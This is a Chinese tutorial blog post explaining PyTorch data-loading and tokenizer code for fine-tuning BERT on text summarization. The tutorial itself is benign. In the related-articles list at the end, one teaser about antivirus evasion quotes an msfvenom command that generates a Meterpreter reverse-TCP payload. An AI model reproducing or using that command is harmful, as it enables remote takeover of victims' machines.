bert中文文本摘要代码(1)

news2024/11/24 19:42:27

bert中文文本摘要代码

  • 写在最前面
  • 关于BERT
    • 使用transformers库进行微调
  • load_data.py
    • 自定义参数
    • collate_fn函数
    • BertDataset类
    • 主函数
  • tokenizer.py
    • 创建词汇表
    • encode函数
    • decode函数

写在最前面

熟悉bert+文本摘要的下游任务微调的代码,方便后续增加组件实现idea

代码来自:
https://github.com/jasoncao11/nlp-notebook/tree/master

已跑通,略有修改

关于BERT

BERT模型参数的数量取决于具体实现,在Google发布的BERT模型中,大概有1.1亿个模型参数。

通常情况下,BERT的参数是在训练期间自动优化调整的,因此在使用预训练模型时不需要手动调节模型参数。
如果想微调BERT模型以适应特定任务,可以通过改变学习率、正则化参数和其他超参数来调整模型参数。在这种情况下,需要进行一些实验以找到最佳的参数配置。

使用transformers库进行微调

主要包括:

  • Tokenizer:使用提供好的Tokenizer对原始文本处理,得到Token序列;
  • 构建模型:在提供好的模型结构上,增加下游任务所需预测接口,构建所需模型;
  • 微调:将Token序列送入构建的模型,进行训练。

本文主要为第一part

load_data.py

这段代码是BERT中读取数据的部分,主要实现了将数据集读取为PyTorch的数据集格式,包括对数据进行padding和collate操作。

自定义参数

  • 训练集、测试集地址
    TRAIN_DATA_PATH = ‘./data/train.tsv’
    DEV_DATA_PATH = ‘./data/dev.tsv’

  • 最大文字长度、批数据大小
    MAX_LEN = 512
    BATCH_SIZE = 8

# -*- coding: utf-8 -*-
import csv
import torch
import torch.utils.data as tud
from torch.nn.utils.rnn import pad_sequence
from tokenizer import Tokenizer

TRAIN_DATA_PATH = './data/train.tsv'
DEV_DATA_PATH = './data/dev.tsv'
MAX_LEN = 512
BATCH_SIZE = 8

collate_fn函数

这段代码用于对数据进行批处理(batching)和填充(padding)。具体来说,它将输入和标签序列列表中的所有张量进行填充,使它们的长度都等于batch中的最大长度,并将它们堆叠成一个4维张量。使用的填充值为0或-1或-100(具体取决于输入和标签的类型)。这样得到的一个batch数据可以被输入到神经网络中进行训练。

  • 通过迭代batch_data中的每一个instance来进行数据的padding填充。将处理后的张量添加到对应的列表中,将这些张量作为输入传递到模型中进行推理。
  • instance是指输入数据中的一个单独的样本实例,包含了四个标志(input_ids、token_type_ids、token_type_ids_for_mask和labels)的信息。
  • torch.tensor() 是将上述列表转化为 PyTorch 张量类的函数,dtype=torch.long 指定张量的数据类型为 64 位整型。
  • input_ids 表示输入文本中每个词的编码,token_type_ids 表示每个词属于哪个句子。
  • pad_sequence函数将每个batch数据中的tensor进行长度补全,补全元素为padding_value。
def collate_fn(batch_data):
    """
    DataLoader所需的collate_fun函数,将数据处理成tensor形式
    Args:
        batch_data: batch数据
    Returns:
    """
    # list初始化
    input_ids_list, token_type_ids_list, token_type_ids_for_mask_list, labels_list = [], [], [], []
    for instance in batch_data:
        # 按照batch中的最大数据长度,对数据进行padding填充
        input_ids_temp = instance["input_ids"]
        token_type_ids_temp = instance["token_type_ids"]
        token_type_ids_for_mask_temp = instance["token_type_ids_for_mask"]
        labels_temp = instance["labels"]

        input_ids_list.append(torch.tensor(input_ids_temp, dtype=torch.long))
        token_type_ids_list.append(torch.tensor(token_type_ids_temp, dtype=torch.long))
        token_type_ids_for_mask_list.append(torch.tensor(token_type_ids_for_mask_temp, dtype=torch.long))
        labels_list.append(torch.tensor(labels_temp, dtype=torch.long))
    # 使用pad_sequence函数,会将list中所有的tensor进行长度补全,补全到一个batch数据中的最大长度,补全元素为padding_value
    return {"input_ids": pad_sequence(input_ids_list, batch_first=True, padding_value=0),
            "token_type_ids": pad_sequence(token_type_ids_list, batch_first=True, padding_value=0),
            "token_type_ids_for_mask": pad_sequence(token_type_ids_for_mask_list, batch_first=True, padding_value=-1),
            "labels": pad_sequence(labels_list, batch_first=True, padding_value=-100)}

BertDataset类

BertDataset类继承了torch.utils.data.Dataset类,实现了__init__、__len__和__getitem__三个函数用于初始化数据集,获取数据集长度,以及获取指定位置的数据。

__init__函数中,将原始数据读取后进行分词,并将得到的数据以字典形式保存到self.data_set中;
其中,摘要为tsv文件的第一列数据,原文为第二列数据。
在这里插入图片描述
Tokenizer.encode是Hugging Face库中的一个方法,用于处理自然语言处理任务中的输入数据,将文本转换成数字序列
该方法使用预训练的词汇表(或者根据需要自动生成)来将单词或子词转换成其对应的编码表示。编码后的文本可以作为输入传递给深度学习模型,以便进行训练或推断。
在这里插入图片描述

__getitem__函数中,根据给定索引idx返回self.data_set中对应位置的字典。
__len__函数中,根据可迭代的数据集data_set返回该长度。

class BertDataset(tud.Dataset):
    def __init__(self, data_path):
        super(BertDataset, self).__init__()

        self.data_set = []
        with open (data_path, 'r', encoding='utf8') as rf:
            r = csv.reader(rf, delimiter='\t')
            next(r)
            for row in r:
                summary = row[0]
                content = row[1]
                
                input_ids, token_type_ids, token_type_ids_for_mask, labels = Tokenizer.encode(content, summary, max_length=MAX_LEN)
                       
                self.data_set.append({"input_ids": input_ids, 
                                      "token_type_ids": token_type_ids, 
                                      "token_type_ids_for_mask": token_type_ids_for_mask,
                                      "labels": labels})
               
    def __len__(self):
        return len(self.data_set)
    
    def __getitem__(self, idx):
        return self.data_set[idx]

主函数

通过tud.DataLoader函数将BertDataset转换为PyTorch的DataLoader格式,即可用于训练模型。

traindataset = BertDataset(TRAIN_DATA_PATH)
traindataloader = tud.DataLoader(traindataset, BATCH_SIZE, shuffle=True, collate_fn=collate_fn)

valdataset = BertDataset(DEV_DATA_PATH)
valdataloader = tud.DataLoader(valdataset, BATCH_SIZE, shuffle=False, collate_fn=collate_fn)


# for batch in valdataloader:
#     print(batch["input_ids"])
#     print(batch["input_ids"].shape)
#     print('------------------')
    
#     print(batch["token_type_ids"])
#     print(batch["token_type_ids"].shape)
#     print('------------------')
    
#     print(batch["token_type_ids_for_mask"])
#     print(batch["token_type_ids_for_mask"].shape)
#     print('------------------')
    
#     print(batch["labels"])
#     print(batch["labels"].shape)
#     print('------------------')

tokenizer.py

定义Tokenizer类,用于处理文本生成任务中的分词和索引映射操作。

创建词汇表

读取BERT模型的词汇表文件,并创建了一些方便的数据结构,用于在文本生成任务中进行分词和索引映射操作。

注意:使用的是BERT模型的中文版本,并且已经下载了相应的预训练模型文件。

  • 打开"vocab.txt"文件,该文件是BERT模型的词汇表文件,包含了模型所使用的所有词汇及其对应的索引。
  • 逐行读取文件内容,并将每个词汇和其对应的索引存储在一个名为word2idx的字典中。方便通过词汇找到对应的索引。
  • 定义一些常用的特殊标记的索引,如"[CLS]“、”[SEP]“和”[UNK]",标记在BERT模型中有特殊的含义,用于表示句子的起始、结束和未知词汇等。
  • 创建idx2word字典,用于将索引映射回对应的词汇。可以通过索引找到对应的词汇。
# -*- coding: utf-8 -*-
import unicodedata

class Tokenizer():

    with open("./bert-base-chinese/vocab.txt", encoding="utf-8") as f:
        lines = f.readlines()
    word2idx = {}
    for index, line in enumerate(lines):
        word2idx[line.strip("\n")] = index
    cls_id = word2idx['[CLS]']
    sep_id = word2idx['[SEP]']
    unk_id = word2idx['[UNK]']
    idx2word = {idx: word for word, idx in word2idx.items()}

encode函数

将输入的文本转换为BERT模型所需的输入编码。

第一个文本(first_text):

  • 转换为小写形式。
  • Unicode规范化,将文本中的字符进行标准化处理,将其中的字符规范化为NFD形式。
  • 将每个词汇转换为对应的索引,如果词汇不在词汇表中,则使用未知词汇(unk_id)的索引表示。
  • 在开头插入特殊标记"[CLS]"的索引(cls_id)。
  • 在词汇索引序列的末尾添加特殊标记"[SEP]"的索引(sep_id)。

如果还有第二个文本(second_text)作为输入,则进行类似的处理。
(但第二个文本不需要在开始插入"[CLS]"?)

最终,该方法返回两个文本的编码结果,即第一个文本和第二个文本的词汇索引序列。如果没有第二个文本,则返回的第二个文本的编码结果为空列表。这样,可以将输入文本转换为适合输入到BERT模型的编码表示形式。

    @classmethod
    def encode(cls, first_text, second_text=None, max_length=512):
        first_text = first_text.lower()
        first_text = unicodedata.normalize('NFD', first_text)

        first_token_ids = [cls.word2idx.get(t, cls.unk_id) for t in first_text]
        first_token_ids.insert(0, cls.cls_id)
        first_token_ids.append(cls.sep_id)

        if second_text:
            second_text = second_text.lower()
            second_text = unicodedata.normalize('NFD', second_text)

            second_token_ids = [cls.word2idx.get(t, cls.unk_id) for t in second_text]
            second_token_ids.append(cls.sep_id)
        else:
            second_token_ids = []

对词汇索引序列进行处理,以保证其总长度不超过指定的最大长度(max_length)。

使用循环,不断检查总长度是否超过max_length,并根据情况进行调整。处理逻辑如下:

  1. 计算当前词汇索引序列的总长度(包括第一个文本和第二个文本),存储在total_length变量中。
  2. 如果总长度total_length小于等于max_length,则跳出循环,不需要进行截断。
  3. 删除两个文本中更长的那个,则从倒数第二个位置处删除一个词汇,以减少总长度。
  4. 经过循环处理后,保证词汇索引序列的总长度不超过max_length。

接下来:

  1. 创建first_token_type_ids列表,其长度与first_token_ids相同,并且将所有元素设置为0。这用于表示第一个文本中的词汇属于第一个句子。
  2. 创建first_token_type_ids_for_mask列表,其长度与first_token_ids相同,并且将所有元素设置为1。这用于在遮蔽(mask)操作中标记第一个文本的词汇。
  3. 创建labels列表,其长度与first_token_ids相同,并且将所有元素设置为-100。这是为了后续任务标签的设置,-100表示忽略该位置的标签。

如果存在第二个文本,则进行进一步处理:

  1. 创建second_token_type_ids列表,其长度与second_token_ids相同,并且将所有元素设置为1。这用于表示第二个文本中的词汇属于第二个句子。
  2. 创建second_token_type_ids_for_mask列表,其长度与second_token_ids相同,并且将所有元素设置为0。这用于在遮蔽操作中标记第二个文本的词汇。
  3. 将第二个文本的词汇索引序列等(second_token_ids),分别添加到第一个文本的词汇索引序列(first_token_ids)末尾等。

最后返回:(文本1、文本2)两个文本的词汇索引序列(first_token_ids)、词汇类型序列(first_token_type_ids)、遮蔽词汇类型序列(first_token_type_ids_for_mask)和标签序列(labels)。这些结果可用于进一步的BERT模型输入。

        while True:
            total_length = len(first_token_ids) + len(second_token_ids)
            if total_length <= max_length:
                break
            elif len(first_token_ids) > len(second_token_ids):
                first_token_ids.pop(-2)
            else:
                second_token_ids.pop(-2)

        first_token_type_ids = [0] * len(first_token_ids)
        first_token_type_ids_for_mask = [1] * len(first_token_ids)
        labels = [-100] * len(first_token_ids) 

        if second_token_ids:
            second_token_type_ids = [1] * len(second_token_ids)
            second_token_type_ids_for_mask = [0] * len(second_token_ids)

            first_token_ids.extend(second_token_ids)
            first_token_type_ids.extend(second_token_type_ids)
            first_token_type_ids_for_mask.extend(second_token_type_ids_for_mask)
            labels.extend(second_token_ids)
            
        return first_token_ids, first_token_type_ids, first_token_type_ids_for_mask, labels

decode函数

将输入的词汇索引序列转换回对应的文本。

首先遍历输入的词汇索引序列(input_ids),对每个索引进行如下操作:

  1. 通过索引值从idx2word字典中获取对应的词汇。
  2. 将获取的词汇添加到一个名为tokens的列表中。

最后,代码使用空格将tokens列表中的词汇拼接起来,形成一个字符串。这样,将词汇索引序列转换为对应的文本字符串。

返回转换后的文本字符串。

    @classmethod
    def decode(cls, input_ids):
      tokens = [cls.idx2word[idx] for idx in input_ids]
      return ' '.join(tokens)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/596618.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Vue.js+nodejs高校水电费缴费设备维修管理系统

本大学城水电管理系统管理员功能有个人中心&#xff0c;用户管理&#xff0c;领用设备管理&#xff0c;消耗设备管理&#xff0c;设备申请管理&#xff0c;设备派发管理&#xff0c;状体汇报管理&#xff0c;领用报表管理&#xff0c;消耗报表管理&#xff0c;班组报表管理&…

面向对象编程 实验二 MouseHit--SDUWH

来源网络。仅供参考 面向对象编程技术 实验二实验报告 1.实验要求 熟悉Visual Studio的环境与使用,创建一个新的工程以EasyWin为示例程序完成第一个Windows程序的编写、调试、运行。练习命令行的方式进行程序创建。 在理解Windows按键与鼠标的基础上,开发一个小型的打字…

feat:使用企业微信JS-SDK的onMenuShareAppMessage()实现点击转发自定义分享内容(TypeScript)

背景&#xff1a;企业微信应用使用企业微信JS-SDK的分享接口实现分享样式自定义 原生&#xff1a; 需要实现成&#xff1a; 企业微信JS-SDK 是企业微信面向网页开发者提供的 基于企业微信内 的网页开发工具包。 通过使用企业微信JS-SDK&#xff0c;网页开发者 可借助企业微信…

Python-shellcode免杀分离

#Python-原生态-MSF&CS&生成&执行代码 MSF-payload&#xff1a;msfvenom -p windows/meterpreter/reverse_tcp lhostX.X.X.X lport6688 -f c CS-payload&#xff1a; 攻击--生成后门--payload生成器--选择监听器和输出格式为C语言 python 3.10-32位&#xff0c;注…

如何将完成的报告从 FastReport .NET 导出到 S3

FastReport .NET 报表生成器FastReport .NET是适用于.NET Core 3&#xff0c;ASP.NET&#xff0c;MVC和Windows窗体的全功能报告库。使用FastReport .NET&#xff0c;您可以创建独立于应用程序的.NET报告。 简单存储服务是一种用于存储大量数据的服务。该服务将存储的数据划分…

BERT在GLUE数据集构建任务(未完待续。。。)

0 Introduction 谷歌开源的BERT项目在Github上&#xff0c;视频讲解可以参考B站上的一个视频 1 GLUE部分基准数据集介绍 GLUE数据集官网GLUE数据集下载&#xff0c;建议下载运行这个.py脚本文件进行数据集的下载&#xff0c;如果连接无法打开&#xff0c;运行下面代码。运行…

想知道视频转音频怎么操作?快来看看这三种方法

在数字化时代&#xff0c;视频已成为人们生活、学习、工作中不可或缺的元素。不过&#xff0c;在某些情况下&#xff0c;仅通过视觉体验来获取信息可能并不方便或实用。比如&#xff0c;对于听障人士&#xff0c;他们无法通过视觉方式获取信息&#xff0c;但可以通过听觉方式接…

一文教你高速PCB信号完整性仿真怎么做

在高速PCB设计中&#xff0c;信号完整性是确保信号在电路板上传输过程中的稳定性和可靠性的重点&#xff0c;通过仿真工具进行信号完整性可帮助工程师在设计阶段解决信号完整性问题&#xff0c;从而优化电路板的性能和可靠性。那么如何做好PCB信号完整性仿真&#xff1f;下面来…

1.3 eBPF的工作原理初探

写在前面 上一节提到过,eBPF程序是面向BPF体系结构指令集编写的,它并不直接运行在Linux内核中,我们可以理解为它是运行在eBPF虚拟机,由eBPF虚拟机来执行eBPF字节码,就像java运行在jvm一样。 我们用一张原理图来看下eBPF程序的编译,加载,验证,钩子,映射等结点。 如上是…

Matlab查找整行为0的行号并记录

find函数 该函数可以查找非零元素的索引和值 例如&#xff1a; X 331 0 20 1 10 0 4 k find(X) %返回非零元素的索引号&#xff0c;即按列检索对应数值的序号 k_0 find(~X) %返回零元素的索引号 matlab检索索引号的方式如下&#xff1a;输出结…

CDN之域名管理操作流程简介

一、火伞云端配置 1、点击“域名管理”&#xff0c;找到需要配置的域名&#xff0c;点击“常规配置” 2、进入“域名配置”界面&#xff0c;点击“配置我的CNAME” 3、将要配置的CNAME配置到我的DNS&#xff0c;请复制此处的CNAME地址&#xff0c;同时打开您网站所属的DNS服务…

Linux 扩展磁盘空间

1. 为什么我的 Linux 磁盘空间不够用&#xff1f;/ 插入新的磁盘要怎么用&#xff1f; [注]&#xff1a;第一节基本是一些啰里啰唆的内容&#xff0c;想直接看如何操作&#xff0c;请直接跳转至第二小节&#x1f9d0; 很多人遇到这样的问题&#xff0c;当给一台新的主机安装上…

MySQL报错cannot add foreign key constraint解决方法

1 问题场景 利用Navicat对MySQL两张表想要进行外键关联时设置正确&#xff0c;但出现出现如下错误 2 原因分析 创建外键错误的原因大概有一下几个原因&#xff1a; 1、关联的两个字段的字段的类型不一致 2、设置外键删除时set null 3、两张表的引擎不一致 2.1 数据类型不一…

2023 下半年程序员生存指南!

见字如面&#xff0c;我是军哥&#xff01; 最近看到 4 月份&#xff0c;我国青年失业率 20.4%&#xff0c;说实话这个数字相当的高呀&#xff01; 另外&#xff0c;伴随最近若干大厂裁员&#xff0c;就这周就有两位读者跟我说被裁员了&#xff0c;我估计下半年的 IT 行业更是艰…

BR 5AP1130.156C-000

物料号: 5AP1130.156C-000 描述: 自动化装置面板 15.6" FullHD TFT - 1920 x 1080 像素 (16:9) - 多点触控&#xff08;投射电容&#xff09; - 开关柜安装 - 横向 - 用于 PPC900/PPC2100/PPC3100/ 联接模块 B&R ID 代码0xEC5D许可证 显示屏 类型TFT 彩色对角线…

ChatGPT 插件:深入探讨 OpenAI 的新功能及其如何改变我们使用 AI 的方式

OpenAI的API现在正在为成千上万的商业和开源项目和应用程序提供AI动力。而在推出六个月后&#xff0c;ChatGPT的插件终于加入了机智的聊天机器人&#xff0c;能够更好的应用在不同的场景中。 &#x1f50c; 什么是ChatGPT插件&#xff1f; ChatGPT插件是专门的扩展&#xff0…

报错:dll不是有效的win32应用程序

学习如何创建并调用动态库时&#xff0c;新建了一个项目用于调用自己创建的动态库&#xff0c;如下&#xff1a; 其中Dll3是新创建的动态库&#xff0c;text3是新建的另一个项目用于调用Dll3动态库&#xff0c;运行时报错如下&#xff1a; 原因在于Dll3动态库是默认的启动项目…

得物 H5容器 野指针疑难问题排查 解决

1背景 得物 iOS 4.9.x 版本 上线后&#xff0c;一些带有横向滚动内容的h5页面&#xff0c;有一个webkit 相关crash增加较快。通过Crash堆栈判断是UIScrollview执行滚动动画过程中内存野指针导致的崩溃。 2前期排查 通过页面浏览日志&#xff0c;发现发生崩溃时所在的页面都是…

C/C++数据类型从0到内存具体分配详解

一&#xff0c;数据类型分类 1.整形家族&#xff1a;char , short , int , long , long long , unsigned int , unsigned char , unsinged short , unsigned long , unsinged long long 。&#xff08;为什么将char归入整形家族是因为字符在机器中是以Ascll码值储存的&#…

分类管理你的联系人,有效提升营销转化率!

电子邮件营销已成为外贸和跨境电商企业宣传产品和服务的必不可少的工具。在电子邮件营销中&#xff0c;电子邮件联系人列表的质量对活动的成功至关重要。提高联系人名单质量的途径之一就是对联系人进行分类管理。本文将讨论为邮件联系人为什么要分类管理&#xff1f; 1、提高活…